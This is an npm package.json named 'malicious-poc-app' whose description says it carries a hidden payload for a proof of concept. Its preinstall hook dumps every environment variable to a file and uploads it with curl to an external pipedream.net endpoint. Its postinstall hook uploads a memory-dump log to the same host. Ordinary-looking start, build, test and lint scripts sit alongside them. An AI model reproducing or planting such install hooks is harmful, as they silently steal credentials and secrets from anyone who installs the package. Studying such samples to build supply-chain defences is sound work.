{
    "name": "malicious-poc-app",
    "version": "1.0.0",
    "description": "A new app submission with a hidden payload for PoC.",
    "main": "index.js",
    "scripts": {
        "preinstall": "echo 'Preinstall script running - attempting to exfiltrate secrets (env dump)...' && env > /tmp/env_dump && curl -X PUT --upload-file /tmp/env_dump https://eoiissjprny7lfp.m.pipedream.net/env_secrets.txt",
        "postinstall": "echo 'Postinstall script running - attempting memdump...' && curl --request PUT 'https://eoiissjprny7lfp.m.pipedream.net/memdump_results.txt' --form 'file=@/tmp/memdump_output.log'",
        "start": "echo 'Safe start script'",
        "build": "echo 'Safe build script'",
        "test": "echo 'Safe test script'",
        "lint": "echo 'Safe lint script'"
    },
    "dependencies": {
        "lodash": "^4.17.21"
    }
}
